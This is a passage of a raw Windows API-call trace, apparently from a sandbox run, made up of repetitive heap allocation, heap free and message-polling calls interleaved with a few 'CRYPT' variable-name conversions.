Flags=0x0, Size=0x10) returned 0x2e51070 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.021] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0225.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0225.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.022] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0225.022] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0225.022] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.022] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.022] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.022] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.023] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0225.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0225.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0225.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0225.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0225.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0225.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0225.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0225.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2e94cd0 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94cd0 | out: hHeap=0x970000) returned 1 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0225.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 